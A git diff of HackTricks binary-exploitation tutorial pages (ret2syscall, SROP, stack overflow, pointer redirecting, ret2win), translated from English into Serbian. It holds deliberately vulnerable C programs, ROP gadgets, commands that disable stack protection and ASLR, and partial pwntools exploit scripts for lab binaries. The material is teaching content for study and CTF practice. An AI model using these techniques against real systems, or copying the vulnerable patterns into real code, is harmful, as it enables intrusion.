-    printf("Congratulations!\n");
+printf("Congratulations!\n");
 }
 
 void vulnerable_function() {
-    char buffer[64];
-    read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
+char buffer[64];
+read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
 }
 
 int main() {
-    vulnerable_function();
-    return 0;
+vulnerable_function();
+return 0;
 }
 ```
-
-Compile without pie and canary:
-
+Kompajlirati bez pie i kanarinca:
 ```bash
 clang -o ret2win ret2win.c -fno-stack-protector
 ```
-
 ## Gadgets
 
-In order to prepare the call for the **syscall** it's needed the following configuration:
+Da bi se pripremio poziv za **syscall**, potrebna je sledeća konfiguracija:
 
 - `x8: 221 Specify sys_execve`
 - `x0: ptr to "/bin/sh" specify file to execute`
 - `x1: 0 specify no arguments passed`
 - `x2: 0 specify no environment variables passed`
 
-Using ROPgadget.py I was able to locate the following gadgets in the libc library of the machine:
-
+Korišćenjem ROPgadget.py, uspeo sam da lociram sledeće gadget-e u libc biblioteci mašine:
 ```armasm
 ;Load x0, x1 and x3 from stack and x5 and call x5
 0x0000000000114c30:
-    ldp x3, x0, [sp, #8] ;
-    ldp x1, x4, [sp, #0x18] ;
-    ldr x5, [sp, #0x58] ;
-    ldr x2, [sp, #0xe0] ;
-    blr x5
+ldp x3, x0, [sp, #8] ;
+ldp x1, x4, [sp, #0x18] ;
+ldr x5, [sp, #0x58] ;
+ldr x2, [sp, #0xe0] ;
+blr x5
 
 ;Move execve syscall (0xdd) to x8 and call it
 0x00000000000bb97c :
-    nop ;
-    nop ;
-    mov x8, #0xdd ;
-    svc #0
+nop ;
+nop ;
+mov x8, #0xdd ;
+svc #0
 ```
-
-With the previous gadgets we can control all the needed registers from the stack and use x5 to jump to the second gadget to call the syscall.
+Sa prethodnim gadgetima možemo kontrolisati sve potrebne registre sa steka i koristiti x5 da skočimo na drugi gadget kako bismo pozvali syscall.
 
 > [!TIP]
-> Note that knowing this info from the libc library also allows to do a ret2libc attack, but lets use it for this current example.
-
-### Exploit
+> Imajte na umu da poznavanje ovih informacija iz libc biblioteke takođe omogućava izvođenje ret2libc napada, ali hajde da to iskoristimo za ovaj trenutni primer.
 
+### Eksploatacija
 ```python
 from pwn import *
 
@@ -124,5 +117,4 @@ p.sendline(payload)
 
 p.interactive()
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md
index 20e07f3f2..cac686061 100644
--- a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md
@@ -2,25 +2,24 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne Informacije
 
-**`Sigreturn`** is a special **syscall** that's primarily used to clean up after a signal handler has completed its execution. Signals are interruptions sent to a program by the operating system, often to indicate that some exceptional situation has occurred. When a program receives a signal, it temporarily pauses its current work to handle the signal with a **signal handler**, a special function designed to deal with signals.
+**`Sigreturn`** je posebna **syscall** koja se prvenstveno koristi za čišćenje nakon što signalni handler završi svoju izvršavanje. Signali su prekidi koje operativni sistem šalje programu, često da bi ukazali na to da se dogodila neka izuzetna situacija. Kada program primi signal, privremeno pauzira svoj trenutni rad da bi obradio signal pomoću **signal handler-a**, posebne funkcije dizajnirane za rukovanje signalima.
 
-After the signal handler finishes, the program needs to **resume its previous state** as if nothing happened. This is where **`sigreturn`** comes into play. It helps the program to **return from the signal handler** and restores the program's state by cleaning up the stack frame (the section of memory that stores function calls and local variables) that was used by the signal handler.
+Nakon što signalni handler završi, program treba da **nastavi svoje prethodno stanje** kao da se ništa nije dogodilo. Tu dolazi do izražaja **`sigreturn`**. Pomaže programu da **vrati iz signal handler-a** i obnavlja stanje programa čišćenjem steka (odeljak memorije koji čuva pozive funkcija i lokalne promenljive) koji je koristio signalni handler.
 
-The interesting part is how **`sigreturn`** restores the program's state: it does so by storing **all the CPU's register values on the stack.** When the signal is no longer blocked, **`sigreturn` pops these values off the stack**, effectively resetting the CPU's registers to their state before the signal was handled. This includes the stack pointer register (RSP), which points to the current top of the stack.
+Zanimljiv deo je kako **`sigreturn`** obnavlja stanje programa: to čini tako što čuva **sve vrednosti CPU registara na steku.** Kada signal više nije blokiran, **`sigreturn` uklanja ove vrednosti sa steka**, efikasno resetujući registre CPU-a na njihov stanje pre nego što je signal obrađen. Ovo uključuje registar pokazivača steka (RSP), koji pokazuje na trenutni vrh steka.
 
 > [!CAUTION]
-> Calling the syscall **`sigreturn`** from a ROP chain and **adding the registry values** we would like it to load in the **stack** it's possible to **control** all the register values and therefore **call** for example the syscall `execve` with `/bin/sh`.
+> Pozivanje syscall-a **`sigreturn`** iz ROP lanca i **dodavanje registarskih vrednosti** koje bismo želeli da učitamo u **stek** omogućava nam da **kontrolišemo** sve registarske vrednosti i stoga **pozovemo** na primer syscall `execve` sa `/bin/sh`.
 
-Note how this would be a **type of Ret2syscall** that makes much easier to control params to call other Ret2syscalls:
+Napomena kako bi ovo bila **vrsta Ret2syscall** koja olakšava kontrolu parametara za pozivanje drugih Ret2syscall-a:
 
 {{#ref}}
 ../rop-syscall-execv/
 {{#endref}}
 
-If you are curious this is the **sigcontext structure** stored in the stack to later recover the values (diagram from [**here**](https://guyinatuxedo.github.io/16-srop/backdoor_funsignals/index.html)):
-
+Ako vas zanima, ovo je **sigcontext struktura** koja se čuva na steku da bi se kasnije povratile vrednosti (dijagram iz [**ovde**](https://guyinatuxedo.github.io/16-srop/backdoor_funsignals/index.html)):
 ```
 +--------------------+--------------------+
 | rt_sigeturn()      | uc_flags           |
@@ -56,15 +55,13 @@ If you are curious this is the **sigcontext structure** stored in the stack to l
 | __reserved         | sigmask            |
 +--------------------+--------------------+
 ```
-
-For a better explanation check also:
+Za bolje objašnjenje pogledajte takođe:
 
 {% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %}
 
-## Example
-
-You can [**find an example here**](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop/using-srop) where the call to signeturn is constructed via ROP (putting in rxa the value `0xf`), although this is the final exploit from there:
+## Primer
 
+Možete [**pronaći primer ovde**](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop/using-srop) gde se poziv na signeturn konstruira putem ROP (stavljajući u rxa vrednost `0xf`), iako je ovo konačni exploit odatle:
 ```python
 from pwn import *
 
@@ -91,9 +88,7 @@ payload += bytes(frame)
 p.sendline(payload)
 p.interactive()
 ```
-
-Check also the [**exploit from here**](https://guyinatuxedo.github.io/16-srop/csaw19_smallboi/index.html) where the binary was already calling `sigreturn` and therefore it's not needed to build that with a **ROP**:
-
+Proverite takođe [**eksploit ovde**](https://guyinatuxedo.github.io/16-srop/csaw19_smallboi/index.html) gde je binarni fajl već pozivao `sigreturn` i stoga nije potrebno to graditi sa **ROP**:
 ```python
 from pwn import *
 
@@ -126,20 +121,19 @@ target.sendline(payload) # Send the target payload
 # Drop to an interactive shell
 target.interactive()
 ```
-
-## Other Examples & References
+## Ostali Primeri i Reference
 
 - [https://youtu.be/ADULSwnQs-s?feature=shared](https://youtu.be/ADULSwnQs-s?feature=shared)
 - [https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop)
 - [https://guyinatuxedo.github.io/16-srop/backdoor_funsignals/index.html](https://guyinatuxedo.github.io/16-srop/backdoor_funsignals/index.html)
-  - Assembly binary that allows to **write to the stack** and then calls the **`sigreturn`** syscall. It's possible to write on the stack a [**ret2syscall**](../rop-syscall-execv/) via a **sigreturn** structure and read the flag which is inside the memory of the binary.
+- Assembly binarni program koji omogućava **pisanje na stek** i zatim poziva **`sigreturn`** syscall. Moguće je napisati na stek [**ret2syscall**](../rop-syscall-execv/) putem **sigreturn** strukture i pročitati flag koji se nalazi unutar memorije binarnog programa.
 - [https://guyinatuxedo.github.io/16-srop/csaw19_smallboi/index.html](https://guyinatuxedo.github.io/16-srop/csaw19_smallboi/index.html)
-  - Assembly binary that allows to **write to the stack** and then calls the **`sigreturn`** syscall. It's possible to write on the stack a [**ret2syscall**](../rop-syscall-execv/) via a **sigreturn** structure (the binary has the string `/bin/sh`).
+- Assembly binarni program koji omogućava **pisanje na stek** i zatim poziva **`sigreturn`** syscall. Moguće je napisati na stek [**ret2syscall**](../rop-syscall-execv/) putem **sigreturn** strukture (binarni program sadrži string `/bin/sh`).
 - [https://guyinatuxedo.github.io/16-srop/inctf17_stupidrop/index.html](https://guyinatuxedo.github.io/16-srop/inctf17_stupidrop/index.html)
-  - 64 bits, no relro, no canary, nx, no pie. Simple buffer overflow abusing `gets` function with lack of gadgets that performs a [**ret2syscall**](../rop-syscall-execv/). The ROP chain writes `/bin/sh` in the `.bss` by calling gets again, it abuses the **`alarm`** function to set eax to `0xf` to call a **SROP** and execute a shell.
+- 64 bita, bez relro, bez kanarija, nx, bez pie. Jednostavna buffer overflow napada koristeći `gets` funkciju sa nedostatkom gadgeta koji izvršava [**ret2syscall**](../rop-syscall-execv/). ROP lanac piše `/bin/sh` u `.bss` ponovnim pozivanjem gets, zloupotrebljava **`alarm`** funkciju da postavi eax na `0xf` kako bi pozvao **SROP** i izvršio shell.
 - [https://guyinatuxedo.github.io/16-srop/swamp19_syscaller/index.html](https://guyinatuxedo.github.io/16-srop/swamp19_syscaller/index.html)
-  - 64 bits assembly program, no relro, no canary, nx, no pie. The flow allows to write in the stack, control several registers, and call a syscall and then it calls `exit`. The selected syscall is a `sigreturn` that will set registries and move `eip` to call a previous syscall instruction and run `memprotect` to set the binary space to `rwx` and set the ESP in the binary space. Following the flow, the program will call read intro ESP again, but in this case ESP will be pointing to the next intruction so passing a shellcode will write it as the next instruction and execute it.
+- 64 bita assembly program, bez relro, bez kanarija, nx, bez pie. Tok omogućava pisanje na stek, kontrolu nekoliko registara, i pozivanje syscall-a, a zatim poziva `exit`. Izabrani syscall je `sigreturn` koji će postaviti registre i premestiti `eip` da pozove prethodnu syscall instrukciju i izvrši `memprotect` da postavi binarni prostor na `rwx` i postavi ESP u binarnom prostoru. Prateći tok, program će ponovo pozvati read u ESP, ali u ovom slučaju ESP će pokazivati na sledeću instrukciju, tako da će prosleđivanje shellcode-a napisati kao sledeću instrukciju i izvršiti je.
 - [https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/sigreturn-oriented-programming-srop#disable-stack-protection](https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/sigreturn-oriented-programming-srop#disable-stack-protection)
-  - SROP is used to give execution privileges (memprotect) to the place where a shellcode was placed.
+- SROP se koristi za davanje privilegija izvršenja (memprotect) mestu gde je shellcode postavljen.
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md
index ad3191732..0d3b87e87 100644
--- a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md
@@ -2,10 +2,9 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Pwntools example
-
-This example is creating the vulnerable binary and exploiting it. The binary **reads into the stack** and then calls **`sigreturn`**:
+## Pwntools primer
 
+Ovaj primer kreira ranjivi binarni fajl i koristi ga. Binarni fajl **čita u stek** i zatim poziva **`sigreturn`**:
 ```python
 from pwn import *
 
@@ -33,55 +32,49 @@ p = process(binary.path)
 p.send(bytes(frame))
 p.interactive()
 ```
+## bof пример
 
-## bof example
-
-### Code
-
+### Код
 ```c
 #include 
 #include 
 #include 
 
 void do_stuff(int do_arg){
-    if (do_arg == 1)
-        __asm__("mov x8, 0x8b; svc 0;");
-    return;
+if (do_arg == 1)
+__asm__("mov x8, 0x8b; svc 0;");
+return;
 }
 
 
 char* vulnerable_function() {
-    char buffer[64];
-    read(STDIN_FILENO, buffer, 0x1000); // <-- bof vulnerability
+char buffer[64];
+read(STDIN_FILENO, buffer, 0x1000); // <-- bof vulnerability
 
-    return buffer;
+return buffer;
 }
 
 char* gen_stack() {
-    char use_stack[0x2000];
-    strcpy(use_stack, "Hello, world!");
-    char* b = vulnerable_function();
-    return use_stack;
+char use_stack[0x2000];
+strcpy(use_stack, "Hello, world!");
+char* b = vulnerable_function();
+return use_stack;
 }
 
 int main(int argc, char **argv) {
-    char* b = gen_stack();
-    do_stuff(2);
-    return 0;
+char* b = gen_stack();
+do_stuff(2);
+return 0;
 }
 ```
-
-Compile it with:
-
+Kompajlirati sa:
 ```bash
 clang -o srop srop.c -fno-stack-protector
 echo 0 | sudo tee /proc/sys/kernel/randomize_va_space  # Disable ASLR
 ```
+## Eksploatacija
 
-## Exploit
-
-The exploit abuses the bof to return to the call to **`sigreturn`** and prepare the stack to call **`execve`** with a pointer to `/bin/sh`.
-
+Eksploatacija koristi bof da se vrati na poziv **`sigreturn`** i pripremi stek za poziv **`execve`** sa pokazivačem na `/bin/sh`.
 ```python
 from pwn import *
 
@@ -110,44 +103,40 @@ payload += bytes(frame)
 p.sendline(payload)
 p.interactive()
 ```
+## bof пример без sigreturn
 
-## bof example without sigreturn
-
-### Code
-
+### Код
 ```c
 #include 
 #include 
 #include 
 
 char* vulnerable_function() {
-    char buffer[64];
-    read(STDIN_FILENO, buffer, 0x1000); // <-- bof vulnerability
+char buffer[64];
+read(STDIN_FILENO, buffer, 0x1000); // <-- bof vulnerability
 
-    return buffer;
+return buffer;
 }
 
 char* gen_stack() {
-    char use_stack[0x2000];
-    strcpy(use_stack, "Hello, world!");
-    char* b = vulnerable_function();
-    return use_stack;
+char use_stack[0x2000];
+strcpy(use_stack, "Hello, world!");
+char* b = vulnerable_function();
+return use_stack;
 }
 
 int main(int argc, char **argv) {
-    char* b = gen_stack();
-    return 0;
+char* b = gen_stack();
+return 0;
 }
 ```
+## Eksploatacija
 
-## Exploit
-
-In the section **`vdso`** it's possible to find a call to **`sigreturn`** in the offset **`0x7b0`**:
+U sekciji **`vdso`** moguće je pronaći poziv na **`sigreturn`** na offsetu **`0x7b0`**:
 
 

 
-Therefore, if leaked, it's possible to **use this address to access a `sigreturn`** if the binary isn't loading it:
-
+Stoga, ako je otkriven, moguće je **koristiti ovu adresu za pristup `sigreturn`** ako binarni fajl ne učitava.
 ```python
 from pwn import *
 
@@ -176,14 +165,13 @@ payload += bytes(frame)
 p.sendline(payload)
 p.interactive()
 ```
-
-For more info about vdso check:
+Za više informacija o vdso proverite:
 
 {{#ref}}
 ../ret2vdso.md
 {{#endref}}
 
-And to bypass the address of `/bin/sh` you could create several env variables pointing to it, for more info:
+A da zaobiđete adresu `/bin/sh`, možete kreirati nekoliko env varijabli koje upućuju na nju, za više informacija:
 
 {{#ref}}
 ../../common-binary-protections-and-bypasses/aslr/
diff --git a/src/binary-exploitation/stack-overflow/README.md b/src/binary-exploitation/stack-overflow/README.md
index 6de6060f2..ea46ba433 100644
--- a/src/binary-exploitation/stack-overflow/README.md
+++ b/src/binary-exploitation/stack-overflow/README.md
@@ -2,37 +2,34 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## What is a Stack Overflow
+## Šta je Stack Overflow
 
-A **stack overflow** is a vulnerability that occurs when a program writes more data to the stack than it is allocated to hold. This excess data will **overwrite adjacent memory space**, leading to the corruption of valid data, control flow disruption, and potentially the execution of malicious code. This issue often arises due to the use of unsafe functions that do not perform bounds checking on input.
+A **stack overflow** je ranjivost koja se javlja kada program upisuje više podataka na stek nego što je dodeljeno da drži. Ovi viškovi podataka će **prepisati susedni memorijski prostor**, što dovodi do korupcije validnih podataka, prekida kontrolnog toka i potencijalno izvršavanja zlonamernog koda. Ovaj problem često nastaje zbog korišćenja nesigurnih funkcija koje ne vrše proveru granica na ulazu.
 
-The main problem of this overwrite is that the **saved instruction pointer (EIP/RIP)** and the **saved base pointer (EBP/RBP)** to return to the previous function are **stored on the stack**. Therefore, an attacker will be able to overwrite those and **control the execution flow of the program**.
+Glavni problem ovog prepisivanja je što su **sačuvani pokazivač instrukcija (EIP/RIP)** i **sačuvani osnovni pokazivač (EBP/RBP)** za vraćanje na prethodnu funkciju **smešteni na steku**. Stoga, napadač će moći da prepiše te pokazivače i **kontroliše tok izvršavanja programa**.
 
-The vulnerability usually arises because a function **copies inside the stack more bytes than the amount allocated for it**, therefore being able to overwrite other parts of the stack.
+Ranjivost obično nastaje jer funkcija **kopira više bajtova unutar steka nego što je dodeljeno za nju**, čime može da prepiše druge delove steka.
 
-Some common functions vulnerable to this are: **`strcpy`, `strcat`, `sprintf`, `gets`**... Also, functions like **`fgets`** , **`read` & `memcpy`** that take a **length argument**, might be used in a vulnerable way if the specified length is greater than the allocated one.
-
-For example, the following functions could be vulnerable:
+Neke uobičajene funkcije ranjive na ovo su: **`strcpy`, `strcat`, `sprintf`, `gets`**... Takođe, funkcije kao što su **`fgets`**, **`read` & `memcpy`** koje uzimaju **argument dužine**, mogu se koristiti na ranjiv način ako je navedena dužina veća od dodeljene. 
 
+Na primer, sledeće funkcije bi mogle biti ranjive:
 ```c
 void vulnerable() {
-    char buffer[128];
-    printf("Enter some text: ");
-    gets(buffer); // This is where the vulnerability lies
-    printf("You entered: %s\n", buffer);
+char buffer[128];
+printf("Enter some text: ");
+gets(buffer); // This is where the vulnerability lies
+printf("You entered: %s\n", buffer);
 }
 ```
+### Pronalaženje offseta za Stack Overflow
 
-### Finding Stack Overflows offsets
+Najčešći način za pronalaženje stack overflow-a je davanje veoma velikog unosa `A`s (npr. `python3 -c 'print("A"*1000)'`) i očekivanje `Segmentation Fault` koji ukazuje da je **adresu `0x41414141` pokušano pristupiti**.
 
-The most common way to find stack overflows is to give a very big input of `A`s (e.g. `python3 -c 'print("A"*1000)'`) and expect a `Segmentation Fault` indicating that the **address `0x41414141` was tried to be accessed**.
+Štaviše, kada pronađete da postoji ranjivost na Stack Overflow, biće potrebno pronaći offset do trenutka kada je moguće **prepisati adresu povratka**, za to se obično koristi **De Bruijn sekvenca.** Koja za dati alfabet veličine _k_ i podsekvence dužine _n_ predstavlja **cikličnu sekvencu u kojoj se svaka moguća podsekvenca dužine \_n**\_\*\* pojavljuje tačno jednom\*\* kao kontigenta podsekvenca.
 
-Moreover, once you found that there is Stack Overflow vulnerability you will need to find the offset until it's possible to **overwrite the return address**, for this it's usually used a **De Bruijn sequence.** Which for a given alphabet of size _k_ and subsequences of length _n_ is a **cyclic sequence in which every possible subsequence of length \_n**\_\*\* appears exactly once\*\* as a contiguous subsequence.
-
-This way, instead of needing to figure out which offset is needed to control the EIP by hand, it's possible to use as padding one of these sequences and then find the offset of the bytes that ended overwriting it.
-
-It's possible to use **pwntools** for this:
+Na ovaj način, umesto da ručno otkrivate koji offset je potreban za kontrolu EIP-a, moguće je koristiti kao punjenje jednu od ovih sekvenci i zatim pronaći offset bajtova koji su završili prepisivanje. 
 
+Moguće je koristiti **pwntools** za ovo:
 ```python
 from pwn import *
 
@@ -44,26 +41,23 @@ eip_value = p32(0x6161616c)
 offset = cyclic_find(eip_value)  # Finds the offset of the sequence in the De Bruijn pattern
 print(f"The offset is: {offset}")
 ```
-
-or **GEF**:
-
+или **GEF**:
 ```bash
 #Patterns
 pattern create 200 #Generate length 200 pattern
 pattern search "avaaawaa" #Search for the offset of that substring
 pattern search $rsp #Search the offset given the content of $rsp
 ```
+## Iskorišćavanje Stack Overflows
 
-## Exploiting Stack Overflows
+Tokom prelivanja (pretpostavljajući da je veličina prelivanja dovoljno velika) moći ćete da **prepišete** vrednosti lokalnih promenljivih unutar steka sve dok ne dođete do sačuvanih **EBP/RBP i EIP/RIP (ili čak više)**.\
+Najčešći način zloupotrebe ove vrste ranjivosti je **modifikacija adrese povratka** tako da kada funkcija završi, **tok kontrole će biti preusmeren gde god korisnik odredi** u ovoj pokazivaču.
 
-During an overflow (supposing the overflow size if big enough) you will be able to **overwrite** values of local variables inside the stack until reaching the saved **EBP/RBP and EIP/RIP (or even more)**.\
-The most common way to abuse this type of vulnerability is by **modifying the return address** so when the function ends the **control flow will be redirected wherever the user specified** in this pointer.
-
-However, in other scenarios maybe just **overwriting some variables values in the stack** might be enough for the exploitation (like in easy CTF challenges).
+Međutim, u drugim scenarijima možda će samo **prepisivanje nekih vrednosti promenljivih u steku** biti dovoljno za eksploataciju (kao u lakim CTF izazovima).
 
 ### Ret2win
 
-In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. For these challenges you just need to find the **offset to overwrite the return address** and **find the address of the function** to call (usually [**ASLR**](../common-binary-protections-and-bypasses/aslr/) would be disabled) so when the vulnerable function returns, the hidden function will be called:
+U ovom tipu CTF izazova, postoji **funkcija** **unutar** binarnog fajla koja se **nikada ne poziva** i koju **morate pozvati da biste pobedili**. Za ove izazove samo treba da pronađete **offset za prepisivanje adrese povratka** i **pronađete adresu funkcije** koju treba pozvati (obično [**ASLR**](../common-binary-protections-and-bypasses/aslr/) će biti onemogućen) tako da kada ranjiva funkcija vrati, skrivena funkcija će biti pozvana:
 
 {{#ref}}
 ret2win/
@@ -71,15 +65,15 @@ ret2win/
 
 ### Stack Shellcode
 
-In this scenario the attacker could place a shellcode in the stack and abuse the controlled EIP/RIP to jump to the shellcode and execute arbitrary code:
+U ovom scenariju napadač može postaviti shellcode u stek i zloupotrebiti kontrolisani EIP/RIP da skoči na shellcode i izvrši proizvoljan kod:
 
 {{#ref}}
 stack-shellcode/
 {{#endref}}
 
-### ROP & Ret2... techniques
+### ROP & Ret2... tehnike
 
-This technique is the fundamental framework to bypass the main protection to the previous technique: **No executable stack (NX)**. And it allows to perform several other techniques (ret2lib, ret2syscall...) that will end executing arbitrary commands by abusing existing instructions in the binary:
+Ova tehnika je osnovni okvir za zaobilaženje glavne zaštite prethodne tehnike: **No executable stack (NX)**. I omogućava izvođenje nekoliko drugih tehnika (ret2lib, ret2syscall...) koje će završiti izvršavanjem proizvoljnih komandi zloupotrebom postojećih instrukcija u binarnom fajlu:
 
 {{#ref}}
 ../rop-return-oriented-programing/
@@ -87,15 +81,15 @@ This technique is the fundamental framework to bypass the main protection to the
 
 ## Heap Overflows
 
-An overflow is not always going to be in the stack, it could also be in the **heap** for example:
+Prelivanje se ne mora uvek dešavati u steku, može se takođe desiti u **heap-u** na primer:
 
 {{#ref}}
 ../libc-heap/heap-overflow.md
 {{#endref}}
 
-## Types of protections
+## Tipovi zaštita
 
-There are several protections trying to prevent the exploitation of vulnerabilities, check them in:
+Postoji nekoliko zaštita koje pokušavaju da spreče eksploataciju ranjivosti, proverite ih u:
 
 {{#ref}}
 ../common-binary-protections-and-bypasses/
diff --git a/src/binary-exploitation/stack-overflow/pointer-redirecting.md b/src/binary-exploitation/stack-overflow/pointer-redirecting.md
index f92bebd28..b612198c7 100644
--- a/src/binary-exploitation/stack-overflow/pointer-redirecting.md
+++ b/src/binary-exploitation/stack-overflow/pointer-redirecting.md
@@ -1,28 +1,28 @@
-# Pointer Redirecting
+# Preusmeravanje pokazivača
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## String pointers
+## Pokazivači na stringove
 
-If a function call is going to use an address of a string that is located in the stack, it's possible to abuse the buffer overflow to **overwrite this address** and put an **address to a different string** inside the binary.
+Ako poziv funkcije koristi adresu stringa koji se nalazi na steku, moguće je zloupotrebiti prelivanje bafera da se **prepiše ova adresa** i stavi **adresa drugog stringa** unutar binarnog fajla.
 
-If for example a **`system`** function call is going to **use the address of a string to execute a command**, an attacker could place the **address of a different string in the stack**, **`export PATH=.:$PATH`** and create in the current directory an **script with the name of the first letter of the new string** as this will be executed by the binary.
+Na primer, ako poziv funkcije **`system`** treba da **koristi adresu stringa za izvršavanje komande**, napadač može postaviti **adresu drugog stringa na steku**, **`export PATH=.:$PATH`** i kreirati u trenutnom direktorijumu **skriptu sa imenom prvog slova novog stringa** jer će ovo biti izvršeno od strane binarnog fajla.
 
-You can find an **example** of this in:
+Možete pronaći **primer** ovoga na:
 
 - [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/strptr.c](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/strptr.c)
 - [https://guyinatuxedo.github.io/04-bof_variable/tw17_justdoit/index.html](https://guyinatuxedo.github.io/04-bof_variable/tw17_justdoit/index.html)
-  - 32bit, change address to flags string in the stack so it's printed by `puts`
+- 32bit, promeniti adresu na string sa zastavicama na steku tako da se odštampa pomoću `puts`
 
-## Function pointers
+## Pokazivači na funkcije
 
-Same as string pointer but applying to functions, if the **stack contains the address of a function** that will be called, it's possible to **change it** (e.g. to call **`system`**).
+Isto kao i pokazivač na string, ali se primenjuje na funkcije, ako **stek sadrži adresu funkcije** koja će biti pozvana, moguće je **promeniti je** (npr. da pozove **`system`**).
 
-You can find an example in:
+Možete pronaći primer na:
 
 - [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/funcptr.c](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/funcptr.c)
 
-## References
+## Reference
 
 - [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#pointer-redirecting](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#pointer-redirecting)
 
diff --git a/src/binary-exploitation/stack-overflow/ret2win/README.md b/src/binary-exploitation/stack-overflow/ret2win/README.md
index 0cad69c6d..6b66efec7 100644
--- a/src/binary-exploitation/stack-overflow/ret2win/README.md
+++ b/src/binary-exploitation/stack-overflow/ret2win/README.md
@@ -2,49 +2,44 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-**Ret2win** challenges are a popular category in **Capture The Flag (CTF)** competitions, particularly in tasks that involve **binary exploitation**. The goal is to exploit a vulnerability in a given binary to execute a specific, uninvoked function within the binary, often named something like `win`, `flag`, etc. This function, when executed, usually prints out a flag or a success message. The challenge typically involves overwriting the **return address** on the stack to divert execution flow to the desired function. Here's a more detailed explanation with examples:
+**Ret2win** izazovi su popularna kategorija u **Capture The Flag (CTF)** takmičenjima, posebno u zadacima koji uključuju **binary exploitation**. Cilj je iskoristiti ranjivost u datom binarnom fajlu da se izvrši određena, nepozvana funkcija unutar binarnog fajla, često nazvana nešto poput `win`, `flag`, itd. Ova funkcija, kada se izvrši, obično ispisuje zastavicu ili poruku o uspehu. Izazov obično uključuje prepisivanje **povratne adrese** na steku kako bi se preusmerio tok izvršenja na željenu funkciju. Evo detaljnijeg objašnjenja sa primerima:
 
-### C Example
-
-Consider a simple C program with a vulnerability and a `win` function that we intend to call:
+### C primer
 
+Razmotrite jednostavan C program sa ranjivošću i `win` funkcijom koju nameravamo da pozovemo:
 ```c
 #include 
 #include 
 
 void win() {
-    printf("Congratulations! You've called the win function.\n");
+printf("Congratulations! You've called the win function.\n");
 }
 
 void vulnerable_function() {
-    char buf[64];
-    gets(buf); // This function is dangerous because it does not check the size of the input, leading to buffer overflow.
+char buf[64];
+gets(buf); // This function is dangerous because it does not check the size of the input, leading to buffer overflow.
 }
 
 int main() {
-    vulnerable_function();
-    return 0;
+vulnerable_function();
+return 0;
 }
 ```
-
-To compile this program without stack protections and with **ASLR** disabled, you can use the following command:
-
+Da biste kompajlirali ovaj program bez zaštite steka i sa **ASLR** onemogućenim, možete koristiti sledeću komandu:
 ```sh
 gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c
 ```
+- `-m32`: Kompajlirajte program kao 32-bitni binarni (ovo je opcionalno, ali uobičajeno u CTF izazovima).
+- `-fno-stack-protector`: Onemogućite zaštitu od prelivanja steka.
+- `-z execstack`: Dozvolite izvršavanje koda na steku.
+- `-no-pie`: Onemogućite poziciono nezavisne izvršne datoteke kako biste osigurali da se adresa funkcije `win` ne menja.
+- `-o vulnerable`: Imenovati izlaznu datoteku `vulnerable`.
 
-- `-m32`: Compile the program as a 32-bit binary (this is optional but common in CTF challenges).
-- `-fno-stack-protector`: Disable protections against stack overflows.
-- `-z execstack`: Allow execution of code on the stack.
-- `-no-pie`: Disable Position Independent Executable to ensure that the address of the `win` function does not change.
-- `-o vulnerable`: Name the output file `vulnerable`.
-
-### Python Exploit using Pwntools
-
-For the exploit, we'll use **pwntools**, a powerful CTF framework for writing exploits. The exploit script will create a payload to overflow the buffer and overwrite the return address with the address of the `win` function.
+### Python Exploit koristeći Pwntools
 
+Za exploit, koristićemo **pwntools**, moćan CTF okvir za pisanje eksploitacija. Skripta za exploit će kreirati payload za prelivanje bafera i prepisivanje adrese povratka sa adresom funkcije `win`.
 ```python
 from pwn import *
 
@@ -64,49 +59,46 @@ payload = b'A' * 68 + win_addr
 p.sendline(payload)
 p.interactive()
 ```
-
-To find the address of the `win` function, you can use **gdb**, **objdump**, or any other tool that allows you to inspect binary files. For instance, with `objdump`, you could use:
-
+Da biste pronašli adresu `win` funkcije, možete koristiti **gdb**, **objdump** ili bilo koji drugi alat koji vam omogućava da pregledate binarne datoteke. Na primer, sa `objdump`, mogli biste koristiti:
 ```sh
 objdump -d vulnerable | grep win
 ```
